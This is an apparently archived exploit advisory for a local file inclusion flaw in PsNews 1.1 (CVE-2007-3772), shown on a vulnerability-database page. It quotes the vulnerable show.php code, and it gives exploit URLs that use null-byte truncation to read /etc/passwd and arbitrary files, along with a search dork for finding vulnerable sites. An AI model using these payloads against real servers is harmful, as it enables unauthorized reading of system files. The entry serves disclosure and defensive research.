Lucene search
+L

PsNews 1.1 - 'show.php?newspath' Local File Inclusion

🗓️ 12 Jul 2007 00:00:00Reported by irk4zType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

PsNews 1.1 Local File Inclusion vulnerability in 'show.php?newspath

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-3772
15 Jul 200722:00
cve
cvelist
Cvelist
CVE-2007-3772
15 Jul 200722:00
cvelist
euvd
EUVD
EUVD-2007-3756
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-3772
15 Jul 200722:30
nvd
prion
Prion
Directory traversal
15 Jul 200722:30
prion
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion                   #
# author: [email protected]                                                       #
# download:                                                                    #
#   http://www.strefaphp.net/index.php?page=download&what=download&fid=12      #
# dork: "Powered by PsNews" ;]                                                 #

/news/show.php:
...
 if(eregi("://", $newspath)){
 	die("Nieautoryzowany dostęp!");
 }
 if(!isset($newspath)){
	 $newspath = "news";
 }
 include("$newspath/functions.php");
...

# exploit:

 http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
 http://[site]/[path]/news/show.php?newspath=[file]%00


# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*

# milw0rm.com [2007-07-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.02394
30